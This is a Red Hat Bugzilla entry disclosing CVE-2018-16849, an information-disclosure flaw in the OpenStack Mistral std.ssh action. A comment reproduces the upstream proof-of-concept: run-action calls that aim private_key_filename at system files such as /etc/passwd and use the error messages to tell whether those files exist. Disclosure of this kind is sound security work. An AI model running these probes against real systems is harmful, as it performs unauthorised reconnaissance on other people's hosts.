Bug 1645334 (CVE-2018-16849) - CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Summary: CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arb...
Status: NEW
Alias: CVE-2018-16849
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20181102,repor...
Keywords: Security
Depends On: 1645350 1645351 1679103
Blocks: 1623055
TreeView+ depends on / blocked
 
Reported: 2018-11-02 01:12 UTC by James Hebden
Modified: 2019-05-22 15:16 UTC (History)
16 users (show)

(edit)
An information-disclosure flaw was discovered in openstack-mistral, where the SSH private key filename of a std.ssh action could be manipulated. The flaw could be exploited to determine the presence of a file path on the host executing the std.ssh action, based on the returned error message.
Clone Of:
(edit)
Last Closed:


Attachments (Terms of Use)

Description James Hebden 2018-11-02 01:12:48 UTC
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.

Comment 1 James Hebden 2018-11-02 02:59:43 UTC
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708

Comment 3 James Hebden 2018-11-02 03:31:36 UTC
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}

Comment 6 Laura Pardo 2019-05-22 15:16:03 UTC
Acknowledgments:

Name: the Mistral project


Note You need to log in before you can comment on or make changes to this bug.